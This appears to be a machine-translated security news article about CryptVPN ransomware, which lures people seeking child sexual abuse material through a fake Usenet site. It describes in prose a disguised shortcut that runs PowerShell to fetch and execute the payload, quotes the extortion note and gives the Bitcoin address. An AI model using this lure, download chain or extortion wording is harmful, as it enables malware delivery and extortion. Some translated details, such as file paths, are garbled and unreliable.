Researchers have discovered a malicious campaign targeting people who actively search for child pornography online. CryptVPN malware operators extort money from pedophiles.
Hackers have been trying to combat the spread of child pornography for quite some time and in their own way. Various malware and ransomware targeting pedophiles began appearing back in the 2010s. For example, one of the first ransomware of this kind, Anti-Child Porn Spam Protection (ACCDFISA), was initially a regular locker that blocked the desktop in Windows, and in later versions it also acquired file encryption.
Advertisement
You can also recall, for example, the high-profile attack on the Dakrnet hoster Freedom Hosting II, which occurred in 2017. Then 10,613 .onion sites were compromised, the attack affected 15-20% of the entire darknet, and the hackers stated that it was revenge for the massive posting of child pornography.
As the publication now writes Bleeping Computerlast week the information security researcher MalwareHunterTeam discovered a sample malware executable file CryptVPNwhich targets pedophiles.
After studying the malware, researchers came to the conclusion that the hackers created a special website posing as UsenetClub, a subscription service that supposedly provides access to Usenet images and videos without censorship. Unfortunately, Usenet is indeed considered a well-known source of child pornography these days.
Advertisement
The fake hacker site offers three subscription levels. There are two paid subscriptions ranging from $69.99 per month to $279.99 per year, plus a third option that claims to provide free access, but requires you to install the free CryptVPN software and use it to access.
If a user downloads the CryptVPN.zip archive from the site, inside he will find a shortcut CLICK-HERE-TO-INSTALL, which is actually an executable file PowerShell.exe with arguments to download the executable file CryptVPN.exe, saving it in C:Windows Tasks.exe and subsequent execution.
The malware executable file is packaged in UPX, but when unpacked it contains a PDB string, which indicates that the author himself called the malware PedoRansom.
Researchers write that there is nothing remarkable in the program itself: it only changes the wallpaper on the victim’s desktop with an extortion message and leaves a similar ransom note in the README.TXT file.
“You were looking for material related to child exploitation and/or sexual abuse. “You were so stupid that you were hacked,” the message reads. “We have collected information about you, and now you must pay us a ransom, otherwise your life is over.”
The note goes on to say that the person must pay $500 to the Bitcoin address bc1q4zfspf0s2gfmuu8h5k0679sxgxjkd7aj5e6qyl within ten days, otherwise their information will be leaked. So far, only $86 has been received from this address, and researchers doubt that CryptVPN operators will be able to “earn” much more.